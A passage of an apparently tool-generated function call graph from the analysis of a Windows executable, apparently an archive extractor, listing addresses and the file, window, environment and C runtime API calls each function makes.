ExpandEnvironmentStringsW 23531->23540 23532 b9c11d SetWindowTextW 23532->23540 23535 ba35de 22 API calls 23535->23540 23537 b9bf0b SetFileAttributesW 23538 b9bfc5 GetFileAttributesW 23537->23538 23550 b9bf25 ___scrt_fastfail 23537->23550 23538->23540 23542 b9bfd7 DeleteFileW 23538->23542 23540->23528 23540->23531 23540->23532 23540->23535 23540->23537 23543 b9c2e7 GetDlgItem SetWindowTextW SendMessageW 23540->23543 23546 b9c327 SendMessageW 23540->23546 23667 b917ac CompareStringW 23540->23667 23668 b99da4 GetCurrentDirectoryW 23540->23668 23670 b8a52a 7 API calls 23540->23670 23671 b8a4b3 FindClose 23540->23671 23672 b9ab9a 76 API calls new 23540->23672 23542->23540 23544 b9bfe8 23542->23544 23543->23540 23545 b8400a _swprintf 51 API calls 23544->23545 23547 b9c008 GetFileAttributesW 23545->23547 23546->23540 23547->23544 23548 b9c01d MoveFileW 23547->23548 23548->23540 23549 b9c035 MoveFileExW 23548->23549 23549->23540 23550->23538 23550->23540 23669 b8b4f7 52 API calls 2 library calls 23550->23669 23552 b9d0ff __EH_prolog 23551->23552 23673 b8fead 23552->23673 23554 b9d130 23677 b85c59 23554->23677 23556 b9d14e 23681 b87c68 23556->23681 23560 b9d1a1 23698 b87cfb 23560->23698 23562 b9b504 23562->23485 23564 b9cd38 23563->23564 24171 b99d1a 23564->24171 23567 b9cd45 GetWindow 23568 b9b5d1 23567->23568 23573 b9cd65 23567->23573 23568->23338 23568->23339 23569 b9cd72 GetClassNameW 24176 b917ac CompareStringW 23569->24176 23571 b9cdfa GetWindow 23571->23568 23571->23573 23572 b9cd96 GetWindowLongW 23572->23571 23574 b9cda6 SendMessageW 23572->23574 23573->23568 23573->23569 23573->23571 23573->23572 23574->23571 23575 b9cdbc GetObjectW 23574->23575 24177 b99d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23575->24177 23577 b9cdd3 24178 b99d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23577->24178 24179 b99f5d 8 API calls ___scrt_fastfail 23577->24179 23580 b9cde4 SendMessageW DeleteObject 23580->23571 23581->23353 23583 b9a2e8 23582->23583 23588 b9a30d 23582->23588 24182 b917ac CompareStringW 23583->24182 23585 b9a31b 23590 b9a7c3 23585->23590 23586 b9a312 SHAutoComplete 23586->23585 23587 b9a2fb 23587->23588 23589 b9a2ff FindWindowExW 23587->23589 23588->23585 23588->23586 23589->23588 23591 b9a7cd __EH_prolog 23590->23591 23592 b81380 82 API calls 23591->23592 23593 b9a7ef 23592->23593 24183 b81f4f 23593->24183 23596 b9a809 23598 b81631 84 API calls 23596->23598 23597 b9a818 23599 b81951 126 API calls 23597->23599 23600 b9a814 23598->23600 23602 b9a83a __vswprintf_c_l new 23599->23602 23600->23381 23600->23384 23601 b81631 84 API calls 23601->23600 23602->23600 23602->23601 23603->23363 23605 b9ac74 5 API calls 23604->23605 23606 b9cb66 GetDlgItem 23605->23606 23607 b9cb88 23606->23607 23608 b9cbbc SendMessageW SendMessageW 23606->23608 23611 b9cb93 ShowWindow SendMessageW SendMessageW 23607->23611 23609 b9cbf8 23608->23609 23610 b9cc17 SendMessageW SendMessageW SendMessageW 23608->23610 23609->23610 23612 b9cc4a SendMessageW 23610->23612 23613 b9cc6d SendMessageW 23610->23613 23611->23608 23612->23613 23613->23388 23614->23443 23615->23467 23616->23472 23617->23477 23618->23483 23619->23349 23620->23418 23621->23439 23622->23415 23623->23406 23624->23497 23625->23495 23628 b8a214 23626->23628 23627 b8a238 23630 b8a180 4 API calls 23627->23630 23628->23627 23629 b8a22b CreateDirectoryW 23628->23629 23629->23627 23631 b8a26b 23629->23631 23632 b8a23e 23630->23632 23634 b8a27a 23631->23634 23639 b8a444 23631->23639 23633 b8a27e GetLastError 23632->23633 23635 b8b66c 2 API calls 23632->23635 23633->23634 23634->23504 23637 b8a254 23635->23637 23637->23633 23638 b8a258 CreateDirectoryW 23637->23638 23638->23631 23638->23633 23640 b9e360 23639->23640 23641 b8a451 SetFileAttributesW 23640->23641 23642 b8a494 23641->23642 23643 b8a467 23641->23643 23642->23634 23644 b8b66c 2 API calls 23643->23644 23645 b8a47b 23644->23645 23645->23642 23646 b8a47f SetFileAttributesW 23645->23646 23646->23642 23648 b89820 23647->23648 23649 b89824 23647->23649 23648->23517 23649->23648 23658 b8a12d 23649->23658 23653 b896dc 23652->23653 23654 b896fa 23652->23654 23653->23654 23656 b896e8 CloseHandle 23653->23656 23655 b89719 23654->23655 23666 b86e3e 74 API calls 23654->23666 23655->23517 23656->23654 23659 b9e360 23658->23659 23660 b8a13a DeleteFileW 23659->23660 23661 b8a14d 23660->23661 23662 b8984c 23660->23662 23663 b8b66c 2 API calls 23661->23663 23662->23517 23664 b8a161 23663->23664 23664->23662 23665 b8a165 DeleteFileW 23664->23665 23665->23662 23666->23655 23667->23540 23668->23540 23669->23550 23670->23540 23671->23540 23672->23540 23674 b8feba 23673->23674 23702 b81789 23674->23702 23676 b8fed2 23676->23554 23678 b8fead 23677->23678 23679 b81789 76 API calls 23678->23679 23680 b8fed2 23679->23680 23680->23556 23682 b87c72 __EH_prolog 23681->23682 23719 b8c827 23682->23719 23684 b87c8d 23725 b9e24a 23684->23725 23686 b87cb7 23731 b9440b 23686->23731 23689 b87ddf 23690 b87de9 23689->23690 23695 b87e53 23690->23695 23763 b8a4c6 23690->23763 23692 b87f06 23692->23560 23693 b87ec4 23693->23692 23769 b86dc1 74 API calls 23693->23769 23695->23693 23697 b8a4c6 8 API calls 23695->23697 23741 b8837f 23695->23741 23697->23695 23699 b87d09 23698->23699 23701 b87d10 23698->23701 23700 b91acf 84 API calls 23699->23700 23700->23701 23703 b8179f 23702->23703 23714 b817fa __vswprintf_c_l 23702->23714 23704 b817c8 23703->23704 23715 b86e91 74 API calls __vswprintf_c_l 23703->23715 23706 b81827 23704->23706 23711 b817e7 new 23704->23711 23708 ba35de 22 API calls 23706->23708 23707 b817be 23716 b86efd 75 API calls 23707->23716 23710 b8182e 23708->23710 23710->23714 23718 b86efd 75 API calls 23710->23718 23711->23714 23717 b86efd 75 API calls 23711->23717 23714->23676 23715->23707 23716->23704 23717->23714 23718->23714 23720 b8c831 __EH_prolog 23719->23720 23721 b9e24a new 8 API calls 23720->23721 23723 b8c874 23721->23723 23722 b9e24a new 8 API calls 23724 b8c898 23722->23724 23723->23722 23724->23684 23727 b9e24f new 23725->23727 23726 b9e27b 23726->23686 23727->23726 23737 ba71ad 7 API calls 2 library calls 23727->23737 23738 b9ecce RaiseException CallUnexpected new 23727->23738 23739 b9ecb1 RaiseException Concurrency::cancel_current_task CallUnexpected 23727->23739 23732 b94415 __EH_prolog 23731->23732 23733 b9e24a new 8 API calls 23732->23733 23734 b94431 23733->23734 23735 b87ce6 23734->23735 23740 b906ba 78 API calls 23734->23740 23735->23689 23737->23727 23740->23735 23742 b88389 __EH_prolog 23741->23742 23770 b81380 23742->23770 23744 b883a4 23778 b89ef7 23744->23778 23750 b883d3 23901 b81631 23750->23901 23753 b884ce 23804 b81f00 23753->23804 23757 b884d9 23757->23750 23808 b83aac 23757->23808 23818 b8857b 23757->23818 23759 b8a4c6 8 API calls 23760 b883cf 23759->23760 23760->23750 23760->23759 23762 b8846e 23760->23762 23905 b8bac4 CompareStringW 23760->23905 23797 b88517 23762->23797 23764 b8a4db 23763->23764 23768 b8a4df 23764->23768 24159 b8a5f4 23764->24159 23766 b8a4ef 23767 b8a4f4 FindClose 23766->23767 23766->23768 23767->23768 23768->23690 23769->23692 23771 b81385 __EH_prolog 23770->23771 23772 b8c827 8 API calls 23771->23772 23773 b813bd 23772->23773 23774 b9e24a new 8 API calls 23773->23774 23777 b81416 ___scrt_fastfail 23773->23777 23775 b81403 23774->23775 23775->23777 23906 b8b07d 23775->23906 23777->23744 23779 b89f0e 23778->23779 23780 b883ba 23779->23780 23922 b86f5d 76 API calls 23779->23922 23780->23750 23782 b819a6 23780->23782 23783 b819b0 __EH_prolog 23782->23783 23788 b81a00 23783->23788 23795 b819e5 23783->23795 23923 b8709d 23783->23923 23785 b81b60 23789 b83aac 97 API calls 23785->23789 23785->23795 23786 b81b50 23926 b86dc1 74 API calls 23786->23926 23788->23785 23788->23786 23788->23795 23790 b81bb3 23789->23790 23791 b81bff 23790->23791 23793 b83aac 97 API calls 23790->23793 23791->23795 23796 b81c32 23791->23796 23927 b86dc1 74 API calls 23791->23927 23793->23790 23794 b83aac 97 API calls 23794->23796 23795->23760 23796->23794 23796->23795 23798 b88524 23797->23798 23945 b90c26 GetSystemTime SystemTimeToFileTime 23798->23945 23800 b88488 23800->23753 23801 b91359 23800->23801 23947 b9d51a 23801->23947 23805 b81f05 __EH_prolog 23804->23805 23807 b81f39 23805->23807 23955 b81951 23805->23955 23807->23757 23809 b83ab8 23808->23809 23810 b83abc 23808->23810 23809->23757 23811 b83ae9 23810->23811 23812 b83af7 23810->23812 23814 b83b29 23811->23814 24089 b83281 85 API calls 3 library calls 23811->24089 24090 b827e8 97 API calls 3 library calls 23812->24090 23814->23757 23816 b83af5 23816->23814 24091 b8204e 74 API calls 23816->24091 23819 b88585 __EH_prolog 23818->23819 23820 b885be 23819->23820 23828 b885c2 23819->23828 24114 b984bd 99 API calls 23819->24114 23821 b885e7 23820->23821 23824 b8867a 23820->23824 23820->23828 23822 b88609 23821->23822 23821->23828 24115 b87b66 151 API calls 23821->24115 23822->23828 24116 b984bd 99 API calls 23822->24116 23824->23828 24092 b85e3a 23824->24092 23828->23757 23829 b88705 23829->23828 24098 b8826a 23829->24098 23831 b88875 23833 b8a4c6 8 API calls 23831->23833 23834 b888e0 23831->23834 23833->23834 24102 b87d6c 23834->24102 23836 b8c991 80 API calls 23840 b8893b _memcmp 23836->23840 23837 b88a70 23838 b88b43 23837->23838 23845 b88abf 23837->23845 23843 b88b9e 23838->23843 23855 b88b4e 23838->23855 23839 b88a69 24119 b81f94 74 API calls 23839->24119 23840->23828 23840->23836 23840->23837 23840->23839 24117 b88236 82 API calls 23840->24117 24118 b81f94 74 API calls 23840->24118 23853 b88b30 23843->23853 24122 b880ea 96 API calls 23843->24122 23844 b88b9c 23847 b89653 79 API calls 23844->23847 23848 b8a180 4 API calls 23845->23848 23845->23853 23846 b89653 79 API calls 23846->23828 23847->23828 23852 b88af7 23848->23852 23850 b88c74 23856 b8aa88 8 API calls 23850->23856 23851 b88c09 23851->23850 23900 b891c1 ___InternalCxxFrameHandler 23851->23900 24123 b89989 23851->24123 23852->23853 24120 b89377 96 API calls 23852->24120 23853->23844 23853->23851 23855->23844 24121 b87f26 100 API calls ___InternalCxxFrameHandler 23855->24121 23859 b88cc3 23856->23859 23857 b88c4c 23857->23850 24127 b81f94 74 API calls 23857->24127 23861 b8aa88 8 API calls 23859->23861 23877 b88cd9 23861->23877 23863 b88c62 24128 b87061 75 API calls 23863->24128 23865 b88d9c 23866 b88efd 23865->23866 23867 b88df7 23865->23867 23869 b88f0f 23866->23869 23870 b88f23 23866->23870 23888 b88e27 23866->23888 23868 b88e69 23867->23868 23872 b88e07 23867->23872 23871 b8826a CharUpperW 23868->23871 23875 b892e6 121 API calls 23869->23875 23876 b92c42 75 API calls 23870->23876 23873 b88e84 23871->23873 23874 b88e4d 23872->23874 23880 b88e15 23872->23880 23883 b88ead 23873->23883 23884 b88eb4 23873->23884 23873->23888 23874->23888 24131 b87907 108 API calls 23874->24131 23875->23888 23879 b88f3c 23876->23879 23877->23865 24129 b89b21 SetFilePointer GetLastError SetEndOfFile 23877->24129 24134 b928f1 121 API calls 23879->24134 24130 b81f94 74 API calls 23880->24130 24132 b87698 84 API calls ___InternalCxxFrameHandler 23883->24132 24133 b89224 94 API calls __EH_prolog 23884->24133 23893 b8904b 23888->23893 24135 b81f94 74 API calls 23888->24135 23890 b89156 23891 b8a444 4 API calls 23890->23891 23890->23900 23894 b891b1 23891->23894 23892 b89104 24109 b89d62 23892->24109 23893->23890 23893->23892 23893->23900 24108 b89ebf SetEndOfFile 23893->24108 23894->23900 24136 b81f94 74 API calls 23894->24136 23897 b8914b 23898 b896d0 75 API calls 23897->23898 23898->23890 23900->23846 23902 b81643 23901->23902 24151 b8c8ca 23902->24151 23905->23760 23907 b8b087 __EH_prolog 23906->23907 23912 b8ea80 80 API calls 23907->23912 23909 b8b099 23913 b8b195 23909->23913 23912->23909 23914 b8b1a7 ___scrt_fastfail 23913->23914 23917 b90948 23914->23917 23920 b90908 GetCurrentProcess GetProcessAffinityMask 23917->23920 23921 b8b10f 23920->23921 23921->23777 23922->23780 23928 b816d2 23923->23928 23925 b870b9 23925->23788 23926->23795 23927->23796 23929 b816e8 23928->23929 23940 b81740 __vswprintf_c_l 23928->23940 23930 b81711 23929->23930 23941 b86e91 74 API calls __vswprintf_c_l 23929->23941 23931 b81767 23930->23931 23937 b8172d new 23930->23937 23933 ba35de 22 API calls 23931->23933 23936 b8176e 23933->23936 23934 b81707 23942 b86efd 75 API calls 23934->23942 23936->23940 23944 b86efd 75 API calls 23936->23944 23937->23940 23943 b86efd 75 API calls 23937->23943 23940->23925 23941->23934 23942->23930 23943->23940 23944->23940 23946 b90c56 __vsnwprintf_l 23945->23946 23946->23800 23948 b9d527 23947->23948 23949 b8ddd1 53 API calls 23948->23949 23950 b9d54a 23949->23950 23951 b8400a _swprintf 51 API calls 23950->23951 23952 b9d55c 23951->23952 23953 b9cb5a 16 API calls 23952->23953 23954 b91372 23953->23954 23954->23753 23956 b81961 23955->23956 23958 b8195d 23955->23958 23959 b81896 23956->23959 23958->23807 23960 b818e5 23959->23960 23961 b818a8 23959->23961 23967 b83f18 23960->23967 23962 b83aac 97 API calls 23961->23962 23965 b818c8 23962->23965 23965->23958 23971 b83f21 23967->23971 23968 b83aac 97 API calls 23968->23971 23969 b81906 23969->23965 23972 b81e00 23969->23972 23971->23968 23971->23969 23984 b9067c 23971->23984 23973 b81e0a __EH_prolog 23972->23973 23992 b83b3d 23973->23992 23975 b81e34 23976 b81ebb 23975->23976 23977 b816d2 76 API calls 23975->23977 23976->23965 23978 b81e4b 23977->23978 24020 b81849 76 API calls 23978->24020 23980 b81e63 23982 b81e6f 23980->23982 24021 b9137a MultiByteToWideChar 23980->24021 24022 b81849 76 API calls 23982->24022 23985 b90683 23984->23985 23986 b9069e 23985->23986 23990 b86e8c RaiseException CallUnexpected 23985->23990 23987 b906af SetThreadExecutionState 23986->23987 23991 b86e8c RaiseException CallUnexpected 23986->23991 23987->23971 23990->23986 23991->23987 23993 b83b47 __EH_prolog 23992->23993 23994 b83b79 23993->23994 23995 b83b5d 23993->23995 23996 b83dc2 23994->23996 24000 b83ba5 23994->24000 24051 b86dc1 74 API calls 23995->24051 24068 b86dc1 74 API calls 23996->24068 23999 b83b68 23999->23975 24000->23999 24023 b92c42 24000->24023 24002 b83c26 24004 b83cb1 24002->24004 24013 b83c1d 24002->24013 24054 b8c991 24002->24054 24003 b83c22 24003->24002 24053 b82034 76 API calls 24003->24053 24036 b8aa88 24004->24036 24006 b83c12 24052 b86dc1 74 API calls 24006->24052 24007 b83bf4 24007->24002 24007->24003 24007->24006 24008 b83cc4 24014 b83d48 24008->24014 24015 b83d3e 24008->24015 24062 b91acf 24013->24062 24060 b928f1 121 API calls 24014->24060 24040 b892e6 24015->24040 24018 b83d46 24018->24013 24061 b81f94 74 API calls 24018->24061 24020->23980 24021->23982 24022->23976 24024 b92c51 24023->24024 24026 b92c5b 24023->24026 24069 b86efd 75 API calls 24024->24069 24027 b92ca2 new 24026->24027 24030 b92c9d Concurrency::cancel_current_task 24026->24030 24035 b92cfd ___scrt_fastfail 24026->24035 24028 b92da9 Concurrency::cancel_current_task 24027->24028 24029 b92cd9 24027->24029 24027->24035 24072 ba157a RaiseException 24028->24072 24070 b92b7b 75 API calls 4 library calls 24029->24070 24071 ba157a RaiseException 24030->24071 24034 b92dc1 24035->24007 24037 b8aa95 24036->24037 24039 b8aa9f 24036->24039 24038 b9e24a new 8 API calls 24037->24038 24038->24039 24039->24008 24041 b892f0 __EH_prolog 24040->24041 24073 b87dc6 24041->24073 24044 b8709d 76 API calls 24045 b89302 24044->24045 24076 b8ca6c 24045->24076 24047 b8935c 24047->24018 24048 b8ca6c 114 API calls 24050 b89314 24048->24050 24050->24047 24050->24048 24085 b8cc51 97 API calls __vswprintf_c_l 24050->24085 24051->23999 24052->24013 24053->24002 24055 b8c9b2 24054->24055 24056 b8c9c4 24054->24056 24086 b86249 80 API calls 24055->24086 24087 b86249 80 API calls 24056->24087 24059 b8c9bc 24059->24004 24060->24018 24061->24013 24063 b91ad9 24062->24063 24064 b91af2 24063->24064 24067 b91b06 24063->24067 24088 b9075b 84 API calls 24064->24088 24066 b91af9 24066->24067 24068->23999 24069->24026 24070->24035 24071->24028 24072->24034 24074 b8acf5 GetVersionExW 24073->24074 24075 b87dcb 24074->24075 24075->24044 24082 b8ca82 __vswprintf_c_l 24076->24082 24077 b8cbf7 24078 b8cc1f 24077->24078 24079 b8ca0b 6 API calls 24077->24079 24080 b9067c SetThreadExecutionState RaiseException 24078->24080 24079->24078 24083 b8cbee 24080->24083 24081 b984bd 99 API calls 24081->24082 24082->24077 24082->24081 24082->24083 24084 b8ab70 89 API calls 24082->24084 24083->24050 24084->24082 24085->24050 24086->24059 24087->24059 24088->24066 24089->23816 24090->23816 24091->23814 24093 b85e4a 24092->24093 24137 b85d67 24093->24137 24095 b85e7d 24097 b85eb5 24095->24097 24142 b8ad65 CharUpperW CompareStringW 24095->24142 24097->23829 24099 b88289 24098->24099 24148 b9179d CharUpperW 24099->24148 24101 b88333 24101->23831 24103 b87d7b 24102->24103 24104 b87dbb 24103->24104 24149 b87043 74 API calls 24103->24149 24104->23840 24106 b87db3 24150 b86dc1 74 API calls 24106->24150 24108->23892 24110 b89d73 24109->24110 24113 b89d82 24109->24113 24111 b89d79 FlushFileBuffers 24110->24111 24110->24113 24111->24113 24112 b89dfb SetFileTime 24112->23897 24113->24112 24114->23820 24115->23822 24116->23828 24117->23840 24118->23840 24119->23837 24120->23853 24121->23844 24122->23853 24124 b8998f 24123->24124 24125 b89992 GetFileType 24123->24125 24124->23857 24126 b899a0 24125->24126 24126->23857 24127->23863 24128->23850 24129->23865 24130->23888 24131->23888 24132->23888 24133->23888 24134->23888 24135->23893 24136->23900 24143 b85c64 24137->24143 24139 b85d88 24139->24095 24141 b85c64 2 API calls 24141->24139 24142->24095 24144 b85c6e 24143->24144 24145 b85d56 24144->24145 24147 b8ad65 CharUpperW CompareStringW 24144->24147 24145->24139 24145->24141 24147->24144 24148->24101 24149->24106 24150->24104 24152 b8c8db 24151->24152 24157 b8a90e 84 API calls 24152->24157 24154 b8c90d 24158 b8a90e 84 API calls 24154->24158 24156 b8c918 24157->24154 24158->24156 24160 b8a5fe 24159->24160 24161 b8a691 FindNextFileW 24160->24161 24162 b8a621 FindFirstFileW 24160->24162 24163 b8a69c GetLastError 24161->24163 24164 b8a6b0 24161->24164 24165 b8a638 24162->24165 24170 b8a675 24162->24170 24163->24164 24164->24170 24166 b8b66c 2 API calls 24165->24166 24167 b8a64d 24166->24167 24168 b8a66a GetLastError 24167->24168 24169 b8a651 FindFirstFileW 24167->24169 24168->24170 24169->24168 24169->24170 24170->23766 24180 b99d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24171->24180 24173 b99d21 24175 b99d2d 24173->24175 24181 b99d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24173->24181 24175->23567 24175->23568 24176->23573 24177->23577 24178->23577 24179->23580 24180->24173 24181->24175 24182->23587 24184 b89ef7 76 API calls 24183->24184 24185 b81f5b 24184->24185 24186 b81f78 24185->24186 24187 b819a6 97 API calls 24185->24187 24186->23596 24186->23597 24188 b81f68 24187->24188 24188->24186 24190 b86dc1 74 API calls 24188->24190 24190->24186 24829 b9b8e0 93 API calls _swprintf 24830 b98ce0 6 API calls 24833 bb16e0 CloseHandle 24835 b9acd0 100 API calls 24879 b919d0 26 API calls std::bad_exception::bad_exception 24207 b9ead2 24208 b9eade CallCatchBlock 24207->24208 24233 b9e5c7 24208->24233 24210 b9eae5 24212 b9eb0e 24210->24212 24313 b9ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24210->24313 24221 b9eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24212->24221 24244 ba824d 24212->24244 24216 b9eb2d CallCatchBlock 24217 b9ebad 24252 b9f020 24217->24252 24221->24217 24314 ba7243 38 API calls 2 library calls 24221->24314 24228 b9ebd9 24230 b9ebe2 24228->24230 24315 ba764a 28 API calls _abort 24228->24315 24316 b9e73e 13 API calls 2 library calls 24230->24316 24234 b9e5d0 24233->24234 24317 b9ed5b IsProcessorFeaturePresent 24234->24317 24236 b9e5dc 24318 ba2016 24236->24318 24238 b9e5e1 24243 b9e5e5 24238->24243 24327 ba80d7 24238->24327 24240 b9e5fc 24240->24210 24243->24210 24247 ba8264 24244->24247 24245 b9ec4a ___delayLoadHelper2@8 5 API calls 24246 b9eb27 24245->24246 24246->24216 24248 ba81f1 24246->24248 24247->24245 24251 ba8220 24248->24251 24249 b9ec4a ___delayLoadHelper2@8 5 API calls 24250 ba8249 24249->24250 24250->24221 24251->24249 24377 b9f350 24252->24377 24255 b9ebb3 24256 ba819e 24255->24256 24379 bab290 24256->24379 24258 ba81a7 24260 b9ebbc 24258->24260 24383 bab59a 38 API calls 24258->24383 24261 b9d5d4 24260->24261 24504 b900cf 24261->24504 24265 b9d5f3 24553 b9a335 24265->24553 24267 b9d5fc 24557 b913b3 GetCPInfo 24267->24557 24269 b9d606 ___scrt_fastfail 24270 b9d619 GetCommandLineW 24269->24270 24271 b9d628 24270->24271 24272 b9d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24270->24272 24560 b9bc84 24271->24560 24273 b8400a _swprintf 51 API calls 24272->24273 24275 b9d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24273->24275 24571 b9aded LoadBitmapW 24275->24571 24278 b9d6a0 24565 b9d287 24278->24565 24279 b9d636 OpenFileMappingW 24282 b9d64f MapViewOfFile 24279->24282 24283 b9d696 CloseHandle 24279->24283 24285 b9d68d UnmapViewOfFile 24282->24285 24286 b9d660 __vswprintf_c_l 24282->24286 24283->24272 24285->24283 24290 b9d287 2 API calls 24286->24290 24292 b9d67c 24290->24292 24291 b98835 8 API calls 24293 b9d76a DialogBoxParamW 24291->24293 24292->24285 24294 b9d7a4 24293->24294 24295 b9d7bd 24294->24295 24296 b9d7b6 Sleep 24294->24296 24298 b9d7cb 24295->24298 24601 b9a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24295->24601 24296->24295 24299 b9d7ea DeleteObject 24298->24299 24300 b9d7ff DeleteObject 24299->24300 24301 b9d806 24299->24301 24300->24301 24302 b9d849 24301->24302 24303 b9d837 24301->24303 24598 b9a39d 24302->24598 24602 b9d2e6 6 API calls 24303->24602 24305 b9d83d CloseHandle 24305->24302 24307 b9d883 24308 ba757e GetModuleHandleW 24307->24308 24309 b9ebcf 24308->24309 24309->24228 24310 ba76a7 24309->24310 24738 ba7424 24310->24738 24313->24210 24314->24217 24315->24230 24316->24216 24317->24236 24319 ba201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24318->24319 24331 ba310e 24319->24331 24322 ba2029 24322->24238 24324 ba2031 24325 ba203c 24324->24325 24345 ba314a DeleteCriticalSection 24324->24345 24325->24238 24373 bab73a 24327->24373 24330 ba203f 8 API calls 3 library calls 24330->24243 24332 ba3117 24331->24332 24334 ba3140 24332->24334 24335 ba2025 24332->24335 24346 ba3385 24332->24346 24351 ba314a DeleteCriticalSection 24334->24351 24335->24322 24337 ba215c 24335->24337 24366 ba329a 24337->24366 24339 ba2166 24344 ba2171 24339->24344 24371 ba3348 6 API calls try_get_function 24339->24371 24341 ba218c 24341->24324 24342 ba217f 24342->24341 24372 ba218f 6 API calls ___vcrt_FlsFree 24342->24372 24344->24324 24345->24322 24352 ba3179 24346->24352 24349 ba33a8 24349->24332 24350 ba33bc InitializeCriticalSectionAndSpinCount 24350->24349 24351->24335 24353 ba31ad 24352->24353 24356 ba31a9 24352->24356 24353->24349 24353->24350 24354 ba31cd 24354->24353 24357 ba31d9 GetProcAddress 24354->24357 24356->24353 24356->24354 24359 ba3219 24356->24359 24358 ba31e9 __crt_fast_encode_pointer 24357->24358 24358->24353 24360 ba3241 LoadLibraryExW 24359->24360 24361 ba3236 24359->24361 24362 ba325d GetLastError 24360->24362 24364 ba3275 24360->24364 24361->24356 24363 ba3268 LoadLibraryExW 24362->24363 24362->24364 24363->24364 24364->24361 24365 ba328c FreeLibrary 24364->24365 24365->24361 24367 ba3179 try_get_function 5 API calls 24366->24367 24368 ba32b4 24367->24368 24369 ba32cc TlsAlloc 24368->24369 24370 ba32bd 24368->24370 24370->24339 24371->24342 24372->24344 24376 bab753 24373->24376 24374 b9ec4a ___delayLoadHelper2@8 5 API calls 24375 b9e5ee 24374->24375 24375->24240 24375->24330 24376->24374 24378 b9f033 GetStartupInfoW 24377->24378 24378->24255 24380 bab299 24379->24380 24382 bab2a2 24379->24382 24384 bab188 24380->24384 24382->24258 24383->24258 24385 ba8fa5 pre_c_initialization 38 API calls 24384->24385 24386 bab195 24385->24386 24404 bab2ae 24386->24404 24388 bab19d 24413 baaf1b 24388->24413 24391 bab1b4 24391->24382 24392 ba8518 __onexit 21 API calls 24393 bab1c5 24392->24393 24394 bab1f7 24393->24394 24420 bab350 24393->24420 24397 ba84de _free 20 API calls 24394->24397 24397->24391 24398 bab1f2 24430 ba895a 20 API calls __dosmaperr 24398->24430 24400 bab23b 24400->24394 24431 baadf1 26 API calls 24400->24431 24401 bab20f 24401->24400 24402 ba84de _free 20 API calls 24401->24402 24402->24400 24405 bab2ba CallCatchBlock 24404->24405 24406 ba8fa5 pre_c_initialization 38 API calls 24405->24406 24411 bab2c4 24406->24411 24408 bab348 CallCatchBlock 24408->24388 24411->24408 24412 ba84de _free 20 API calls 24411->24412 24432 ba8566 38 API calls _abort 24411->24432 24433 baa3f1 EnterCriticalSection 24411->24433 24434 bab33f LeaveCriticalSection _abort 24411->24434 24412->24411 24414 ba3dd6 __fassign 38 API calls 24413->24414 24415 baaf2d 24414->24415 24416 baaf4e 24415->24416 24417 baaf3c GetOEMCP 24415->24417 24418 baaf65 24416->24418 24419 baaf53 GetACP 24416->24419 24417->24418 24418->24391 24418->24392 24419->24418 24421 baaf1b 40 API calls 24420->24421 24422 bab36f 24421->24422 24424 bab3c0 IsValidCodePage 24422->24424 24427 bab376 24422->24427 24428 bab3e5 ___scrt_fastfail 24422->24428 24423 b9ec4a ___delayLoadHelper2@8 5 API calls 24425 bab1ea 24423->24425 24426 bab3d2 GetCPInfo 24424->24426 24424->24427 24425->24398 24425->24401 24426->24427 24426->24428 24427->24423 24435 baaff4 GetCPInfo 24428->24435 24430->24394 24431->24394 24433->24411 24434->24411 24436 bab0d8 24435->24436 24442 bab02e 24435->24442 24439 b9ec4a ___delayLoadHelper2@8 5 API calls 24436->24439 24441 bab184 24439->24441 24441->24427 24445 bac099 24442->24445 24444 baa275 __vsnwprintf_l 43 API calls 24444->24436 24446 ba3dd6 __fassign 38 API calls 24445->24446 24447 bac0b9 MultiByteToWideChar 24446->24447 24449 bac18f 24447->24449 24450 bac0f7 24447->24450 24451 b9ec4a ___delayLoadHelper2@8 5 API calls 24449->24451 24452 ba8518 __onexit 21 API calls 24450->24452 24456 bac118 __vsnwprintf_l ___scrt_fastfail 24450->24456 24453 bab08f 24451->24453 24452->24456 24459 baa275 24453->24459 24454 bac189 24464 baa2c0 20 API calls _free 24454->24464 24456->24454 24457 bac15d MultiByteToWideChar 24456->24457 24457->24454 24458 bac179 GetStringTypeW 24457->24458 24458->24454 24460 ba3dd6 __fassign 38 API calls 24459->24460 24461 baa288 24460->24461 24465 baa058 24461->24465 24464->24449 24467 baa073 __vsnwprintf_l 24465->24467 24466 baa099 MultiByteToWideChar 24468 baa0c3 24466->24468 24469 baa24d 24466->24469 24467->24466 24472 ba8518 __onexit 21 API calls 24468->24472 24475 baa0e4 __vsnwprintf_l 24468->24475 24470 b9ec4a ___delayLoadHelper2@8 5 API calls 24469->24470 24471 baa260 24470->24471 24471->24444 24472->24475 24473 baa12d MultiByteToWideChar 24474 baa199 24473->24474 24476 baa146 24473->24476 24501 baa2c0 20 API calls _free 24474->24501 24475->24473 24475->24474 24492 baa72c 24476->24492 24480 baa1a8 24484 ba8518 __onexit 21 API calls 24480->24484 24487 baa1c9 __vsnwprintf_l 24480->24487 24481 baa170 24481->24474 24482 baa72c __vsnwprintf_l 11 API calls 24481->24482 24482->24474 24483 baa23e 24500 baa2c0 20 API calls _free 24483->24500 24484->24487 24485 baa72c __vsnwprintf_l 11 API calls 24488 baa21d 24485->24488 24487->24483 24487->24485 24488->24483 24489 baa22c WideCharToMultiByte 24488->24489 24489->24483 24490 baa26c 24489->24490 24502 baa2c0 20 API calls _free 24490->24502 24493 baa458 __dosmaperr 5 API calls 24492->24493 24494 baa753 24493->24494 24497 baa75c 24494->24497 24503 baa7b4 10 API calls 3 library calls 24494->24503 24496 baa79c LCMapStringW 24496->24497 24498 b9ec4a ___delayLoadHelper2@8 5 API calls 24497->24498 24499 baa15d 24498->24499 24499->24474 24499->24480 24499->24481 24500->24474 24501->24469 24502->24474 24503->24496 24505 b9e360 24504->24505 24506 b900d9 GetModuleHandleW 24505->24506 24507 b900f0 GetProcAddress 24506->24507 24508 b90154 24506->24508 24510 b90109 24507->24510 24511 b90121 GetProcAddress 24507->24511 24509 b90484 GetModuleFileNameW 24508->24509 24612 